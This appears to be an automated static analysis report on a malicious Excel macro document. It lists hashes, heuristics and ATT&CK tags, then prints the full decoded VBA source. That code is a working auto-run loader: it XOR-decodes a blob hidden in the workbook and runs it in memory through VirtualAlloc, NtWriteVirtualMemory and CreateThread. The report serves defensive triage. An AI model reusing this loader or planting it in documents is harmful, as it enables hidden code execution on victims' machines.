Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ffaa63128e754131…

MALICIOUS

Office (OLE)

Size: 38.6 KB | Created: 2017-07-31 10:12:36 | Authoring application: Microsoft Excel | First seen: 2017-08-08
MD5:     d2829725d66227ec752f623d6cb13af3
SHA-1:   0d26d1a797e9127f80ce37d07823255b0d5a1602
SHA-256: ffaa63128e754131fddeeb31ef9a5c681e5242aa063280796ab44ad5c694143b
Risk score: 78

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The file contains both Excel 4.0 macros and VBA macros, and the heuristics indicate Document_Open and Workbook_Open auto-run entry points. The VBA code declares API calls such as VirtualAlloc and CreateThread, suggesting it is designed to allocate memory and execute code, most likely a second-stage payload. The obfuscated identifiers and a long encoded blob further support this. No specific IOCs such as URLs or hashes were extracted.

Heuristics (6)

  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
    Reference to the VirtualAlloc API.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro present. Matched line in script:
    Public Sub Document_Open()
        jNtjmvTAqPomOrPRs
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro present. Matched line in script:
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind:     xlm-macro
Source:   oletools.olevba.extract_all_macros (XLM macro listing)
Size:     172 bytes
SHA-256:  63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview script (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value

Filename: macros.bas
Kind:     vba-macro
Source:   oletools.olevba.extract_macros (decoded VBA source)
Size:     4785 bytes
SHA-256:  60483b53313bbabff1c8766468df47091f6f480a06e9f757d38356b628face54
Detection: ClamAV: No threats found
Obfuscation or payload: likely
36 of 71 identifiers look randomly generated (e.g. 'fguJUUqORbZngqtMPClrhrSqHEaWDctVXxbrpLJw'), which is consistent with name-mangling obfuscation. The carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function FPNcbrljAUS Lib "kernel32" Alias "CreateThread" (ByVal DmiPFsDOiuIxz As Long, ByVal XKdHHfpRcdLtOdm As Long, ByVal CzQmmdXClmO As LongPtr, wuwofj As Long, ByVal zlBiEcLjfdl As Long, zCVRjGnkTMAwurnuHGw As Long) As LongPtr
Private Declare PtrSafe Function ZIoAADnHSYuMKeNm Lib "kernel32" Alias "VirtualAlloc" (ByVal UxUUhHAwdVMUTZxL As Long, ByVal kdZEpQKkuusPSgpJ As LongPtr, ByVal HOIJQFukYHIVzqHha As Long, ByVal oZSEGjKMniHlOxltsIdOu As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal EurjcoUdKIRzaJHc As LongPtr, ByVal yYdrmDMS As LongPtr, ByVal KgYYdmnQvy As String, ByVal xgvRjxYtpwB As LongPtr, ByRef pBEPqgrQFrREOfMEFljojPK As LongPtr) As LongPtr
#Else
Private Declare Function FPNcbrljAUS Lib "kernel32" Alias "CreateThread"  (ByVal DmiPFsDOiuIxz As Long, ByVal XKdHHfpRcdLtOdm As Long, ByVal CzQmmdXClmO As Long, wuwofj As Long, ByVal zlBiEcLjfdl As Long, zCVRjGnkTMAwurnuHGw As Long) As Long
Private Declare Function ZIoAADnHSYuMKeNm Lib "kernel32" Alias "VirtualAlloc" (ByVal UxUUhHAwdVMUTZxL As Long, ByVal kdZEpQKkuusPSgpJ As Long, ByVal HOIJQFukYHIVzqHha As Long, ByVal oZSEGjKMniHlOxltsIdOu As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal EurjcoUdKIRzaJHc As Long, ByVal yYdrmDMS As Long, ByVal KgYYdmnQvy As String, ByVal xgvRjxYtpwB As Long, ByRef pBEPqgrQFrREOfMEFljojPK As Long) As Long
#End If

Const hTKdvqNRzZUMYNQVrVBmOOZqBF = &H1000
Const dCyRESLvwPriROgyaITJmRaU = &H40

Public Sub jNtjmvTAqPomOrPRs()
    Dim pnCVZcooWzxRDVBVqwT() As Byte

    pnCVZcooWzxRDVBVqwT = XlYAWJtovCzAJQJQAEaX(ActiveWorkbook.FullName)
    Dim Zerox As String
    Zerox = StrConv(pnCVZcooWzxRDVBVqwT, 64)
    
    Dim ptmpNBReTMXoNqVYytczmtK
    ptmpNBReTMXoNqVYytczmtK = Split(Zerox, "fguJUUqORbZngqtMPClrhrSqHEaWDctVXxbrpLJwMpQjHvsJPUqrgvvOodcpTulOHdpJocxdSPFSAIImlqgJMbPCbmclJtCrebBEfJuNwmyrQDoFuQeCnBcFoNIcZmuzmnOygegCWtmzCxMxYxQ")

    Dim asYrDkVoxnMUbHLVaybPYcJCfb As String
    Dim ZoliYfdOpezNF As String
    Dim yqLgnXeRGrOOOpyrNXPZUGMB As String
    ZoliYfdOpezNF = StrConv(StrConv(ptmpNBReTMXoNqVYytczmtK(UBound(ptmpNBReTMXoNqVYytczmtK)), 64), 128)
    yqLgnXeRGrOOOpyrNXPZUGMB = Mid$(ZoliYfdOpezNF, 3, Len(ZoliYfdOpezNF))

    asYrDkVoxnMUbHLVaybPYcJCfb = gzPIYZZkxicFnoan("pZdCYWqsasNkSZeCPPyqJBGUpDc", yqLgnXeRGrOOOpyrNXPZUGMB)
    
    #If VBA7 Then
        Dim rXetUuCPBJobhqUmstfZNKxIpZH As LongPtr
        Dim WCmCDXmVHcCvPspeSxSsY As LongPtr
    #Else
        Dim rXetUuCPBJobhqUmstfZNKxIpZH As Long
        Dim WCmCDXmVHcCvPspeSxSsY As Long
    #End If

    rXetUuCPBJobhqUmstfZNKxIpZH = ZIoAADnHSYuMKeNm(0, Len(asYrDkVoxnMUbHLVaybPYcJCfb), hTKdvqNRzZUMYNQVrVBmOOZqBF, dCyRESLvwPriROgyaITJmRaU)
    WCmCDXmVHcCvPspeSxSsY = NtWriteVirtualMemory(-1, rXetUuCPBJobhqUmstfZNKxIpZH, asYrDkVoxnMUbHLVaybPYcJCfb, Len(asYrDkVoxnMUbHLVaybPYcJCfb), 0)
    WCmCDXmVHcCvPspeSxSsY = FPNcbrljAUS(0, 0, rXetUuCPBJobhqUmstfZNKxIpZH, 0, 0, 0)
End Sub

Public Function XlYAWJtovCzAJQJQAEaX(ByVal IhyNrUUYJwmCEYczMPlHsqtBY As String) As Byte()
    Dim ZoliYfdOpezNF As Long
    Dim yqLgnXeRGrOOOpyrNXPZUGMB() As Byte
    ZoliYfdOpezNF = FreeFile
    If LenB(Dir(IhyNrUUYJwmCEYczMPlHsqtBY)) Then
        Open IhyNrUUYJwmCEYczMPlHsqtBY For Binary Access Read As ZoliYfdOpezNF
        ReDim yqLgnXeRGrOOOpyrNXPZUGMB(LOF(ZoliYfdOpezNF) - 1&) As Byte
        Get ZoliYfdOpezNF, , yqLgnXeRGrOOOpyrNXPZUGMB
        Close ZoliYfdOpezNF
    Else
        Err.Raise 53
    End If
    XlYAWJtovCzAJQJQAEaX = yqLgnXeRGrOOOpyrNXPZUGMB
    Erase yqLgnXeRGrOOOpyrNXPZUGMB
End Function

Public Sub Document_Open()
    jNtjmvTAqPomOrPRs
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function gzPIYZZkxicFnoan(HUukrOqY As String, CXFUSDkIgypjH As String) As String
    Dim ODqgvMAJOMMYS As Long
    Dim nPKyKIxb As String
    Dim DqzuEhCXYZCFHaHVlQSj As Integer, qByHWZKOTPRudKZUcxLdMTet As Integer, a As Long

    For ODqgvMAJOMMYS = 1 To Len(CXFUSDkIgypjH)
        a = ODqgvMAJOMMYS Mod Len(HUukrOqY)
        If a = 0 Then a = Len(HUukrOqY)
        
        DqzuEhCXYZCFHaHVlQSj = Asc(Mid$(CXFUSDkIgypjH, ODqgvMAJOMMYS, 1))
        qByHWZKOTPRudKZUcxLdMTet = Asc(Mid$(HUukrOqY, a, 1))
        nPKyKIxb = nPKyKIxb + Chr(DqzuEhCXYZCFHaHVlQSj Xor qByHWZKOTPRudKZUcxLdMTet)
    Next ODqgvMAJOMMYS
    
    gzPIYZZkxicFnoan = nPKyKIxb
End Function